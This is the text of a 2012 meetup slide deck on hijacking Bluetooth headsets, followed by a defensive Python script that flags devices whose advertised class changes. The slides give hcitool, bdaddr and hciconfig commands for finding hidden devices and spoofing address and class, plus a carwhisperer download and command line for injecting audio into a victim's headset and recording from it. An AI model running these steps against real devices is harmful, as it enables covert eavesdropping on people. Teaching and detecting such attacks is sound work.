Hijacking bluetooth headsets

null Pune Chapter - November 2012 Meet

Published in: Education

  1. 1. By Swaroop YermalkaR
  2. 2. 1. Finding Visible & Invisible Bluetooth Devices along with their specifications 2. Cloning Bluetooth Devices 3. Remotely inject audio into Bluetooth headsets and record audio from them.
  3. 3. BT5 r3 laptop Nokia Bluetooth Bluetooth Dongle Galaxy Headset pop
  4. 4. 79 channels in the 2.4-GHz ISM band. Devices hop across these channels at a rate of 1600 times per second. Bluetooth Device Address (BD_ADDR)
  5. 5. Source: www.techtree.com
  6. 6. Initial Setup
  7. 7. 1. Everything is in visible Android Settings Ubuntu Settings
  8. 8. Find a target first: #hcitool scan #hcitool inq
  9. 9. btscanner
  10. 10. Bluemaho
  11. 11. 2. Let’s Find the Invisible Devices… Source: http://hwaddress.com/
  12. 12. Let’s Find the Invisible Devices…
  13. 13. Android Settings
  14. 14. Start sniffing Sniff on mon0
  15. 15. SAMSUNG
  16. 16. It is Samsung device
  17. 17. We have: 00:07:AB:ff:CF:88 ~ MAC address plus one ~ MAC address minus 1 ~ MAC address minus one FOUND!!!
  18. 18. #hcitool inq <bd_addr>
  19. 19. Enumerate the services for further attack
  20. 20. Recall Previous Information…
  21. 21. #hcitool scan #bdaddr -i hci1 <new_bd_addr>
  22. 22. #hciconfig hci1 name "android" #hciconfig hci0 class 0x58020c
  23. 23. Observe the Fields
  24. 24. Laptop
  25. 25. Why clone the Bluetooth device? On certain premises, some types of Bluetooth device may be restricted. Does it still bother you? For many attacks, such as attacks on a Bluetooth headset, it is necessary to make our device headset compatible.
  26. 26. Is our Bluetooth dongle headset compatible? No? Change its class.
  27. 27. Device conforms to the Headset Profile
  28. 28. Find your victim
  29. 29. Download URL: http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
  30. 30. #./carwhisperer <interface> <injecting audio file> <Outputfile> <victim BD_ADDR>
  31. 31. Built on AIRcable XR™ long-range technology. 1 km external antenna included. Extended range for up to 30 km***. No external power needed. Aluminum case for reduced interference and increased sensitivity.
  32. 32. 1. Bluetooth Hacking: The state of art by trifinite.org 2. Bluetooth Wiki Yi-Bing Lin
  33. 33. Oct-2012 Sep-2012 Nov-2012 www.chmag.in
  34. 34. Feedback, questions and suggestions: swaroop.wireless@gmail.com
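
Added example, not part of the original slides: slides 22 and 26 change a dongle's device class (for instance to 0x58020c) so that it presents as another device type. From the defender's side, this Python code decodes the 24-bit Class of Device field and flags a known BD_ADDR that reappears in `hcitool inq`-style output with a different class than the one recorded for it. The addresses, baseline, scan text and function names are constructed for this example.

```python
import re

# Service-class bits (23..13) of the 24-bit Class of Device (CoD) field.
SERVICES = {13: "Limited Discoverable", 16: "Positioning", 17: "Networking",
            18: "Rendering", 19: "Capturing", 20: "Object Transfer",
            21: "Audio", 22: "Telephony", 23: "Information"}
# Major device class, bits 12..8.
MAJOR = {0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network AP",
         4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable",
         8: "Toy", 9: "Health", 31: "Uncategorized"}

# One result line of `hcitool inq`: address, clock offset, class.
INQ_LINE = re.compile(
    r"([0-9A-Fa-f:]{17})\s+clock offset:\s*0x[0-9A-Fa-f]+\s+class:\s*0x([0-9A-Fa-f]{6})")

# Constructed sample data (not from the slides).
BASELINE = {"AA:BB:CC:00:00:01": 0x58020C,   # recorded earlier as a phone
            "AA:BB:CC:00:00:02": 0x240404}   # recorded earlier as a headset
SAMPLE_SCAN = """Inquiring ...
\tAA:BB:CC:00:00:01\tclock offset: 0x1a2b\tclass: 0x240404
\tAA:BB:CC:00:00:02\tclock offset: 0x0c3d\tclass: 0x240404
"""

def decode_cod(cod):
    """Split a CoD value into major class name, minor class number and services."""
    services = [name for bit, name in sorted(SERVICES.items()) if (cod >> bit) & 1]
    major = (cod >> 8) & 0x1F
    return {"major": MAJOR.get(major, "Reserved"),
            "minor": (cod >> 2) & 0x3F,
            "services": services}

def parse_inq(text):
    """Return {BD_ADDR: class} parsed from inquiry output."""
    return {m.group(1).upper(): int(m.group(2), 16) for m in INQ_LINE.finditer(text)}

def find_class_changes(baseline, observed):
    """List known addresses whose advertised class differs from the baseline."""
    alerts = []
    for addr, cod in observed.items():
        known = baseline.get(addr)
        if known is not None and known != cod:
            alerts.append((addr, decode_cod(known)["major"], decode_cod(cod)["major"]))
    return alerts

if __name__ == "__main__":
    for addr, was, now in find_class_changes(BASELINE, parse_inq(SAMPLE_SCAN)):
        print(f"{addr}: class changed from {was} to {now}")
```

A class change on a known address is a prompt for review, not proof of spoofing, since a clone that also copies the class, as on slide 22, will match the baseline.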
